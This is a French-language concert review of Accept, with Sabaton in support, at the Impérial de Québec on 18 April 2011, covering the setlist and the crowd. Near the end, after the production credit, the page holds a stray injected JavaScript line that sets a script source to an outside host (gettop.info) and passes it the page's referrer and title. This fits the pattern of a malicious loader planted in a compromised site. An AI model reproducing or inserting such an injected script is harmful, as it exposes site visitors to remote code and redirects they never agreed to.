ACCEPT à l’impérial de Québec, 18 avril 2011


Facebooktwitterredditpinterestlinkedinmail

Accept + Sabaton

Lundi 18 avril 2011

Impérial de Québec

Suite à la dissolution de la formation québécoise HANKER le mois dernier, nous avons eu droit à un spectacle légèrement écourté. C’est donc la formation suédoise SABATON qui était en support direct et qui avait l’honneur de réchauffer la salle. Pour leur première présence en sol canadien depuis leur formation en 1999, on peut dire que leurs fans les attendaient de pied ferme et ce, au plus grand plaisir du chanteur, Joakim Bróden. Ce fut une prestation très énergique et plus longue que prévu. Ils ont sûrement conquis quelques fans et parions qu’ils seront de retour prochainement.

Certains les avaient vu en 1983, en 1984 et/ou 1989 mais personne ne les avait jamais vues en tête d’affiche. Quelques un pleuraient encore le départ de l’ancien chanteur, UDO pendant que d’autres se remémoraient beaucoup de souvenirs, quand la formation Allemande ACCEPT est arrivée comme une tonne de briques. Un point à la figure comme on en voit rarement ! Après quelques année d’inactivités, le dernier album paru en 2010, soit Blood Of The Nations est un coup de cœur de plusieurs critiques un peu partout dans le monde, mais qui a malheureusement passé inaperçu auprès des plus vieux fans. C’est avec deux chansons de ce dernier album, Teunotic Terror et Bucket Full Of Hate, que les vieux routards nous démontrent dès le départ que ce n’est pas parce qu’on a 50 ans qu’on ne peut pas botter des culs. Avec la nouvelle venue de Mark Tornillo à la barre, les gens ont vite fait d’oublier que le groupe a déjà eu un autre chanteur, quand le band nous pousse sans hésiter des classiques comme, Starlight et Breaker. Petit remerciement en français et les voilà repartie pour New World Comin’ du dernier opus suivie de Restless And Wild, Sons of a Bitch, Midnight Mover et Metal Heart. Les jeunes plus agités et les plus vieux qui regrettent leur jeune année avec leurs cheveux longs sont tous en émois devant un groupe qui refont leur vieux classique au quart de tour, et ce, avec un son actuel. Cela n’avait rien à voir avec la vieille casette qu’ils écoutaient dans l’auto. Pendant que le reste du groupe reprend son souffle, le guitariste Wolf Hoffmann nous fait quelques notes avec un son sortie des abysses, et sans attendre, ils nous envois Neon Night, bullettproof, losers and Winners et Aiming High. On a même pu voir des gens dans la foule brandissant de vieux 33 tours de la formation. L’atmosphère se calme un peu pendant Princess Of The Dawn mais redevient aussitôt enflammé avec de gros hits back to back comme Up To The Limit et Burning. Les gens sifflent, chantent et crient. Et c’est devant tout se bruit que ACCEPT n’a pas eu d’autre choix que de revenir sur la scène pour faire son rappel. Pratiquement tout le monde sait déjà quelles chansons seront interprétées et les fans veulent les entendre. Le groupe nous fait donc cadeau de Fast as a Shark, Pandemic et le grand classique Balls to the Wall. Pour dire, le groupe est arrivé en ouragan et est reparti en ouragan.

Accept Teutonic Terror

Sans aucun doute un spectacle de Heavy Metal exceptionnelle devant une salle presque pleine. Par moment on se demandait même si ce n’était pas fiston qui amenait papa ou plutôt papa qui amenait fiston. Une prestation qui a amplement rempli les attentes de tous. Souhaitons que ça ne prenne pas un autre 20 ans avant d’y avoir droit encore une fois.

Une production de Capitale du Metal

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Ima nous présente Precious
Next UltimRadio avait raison! Metallica sur les plaines d'Abraham

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *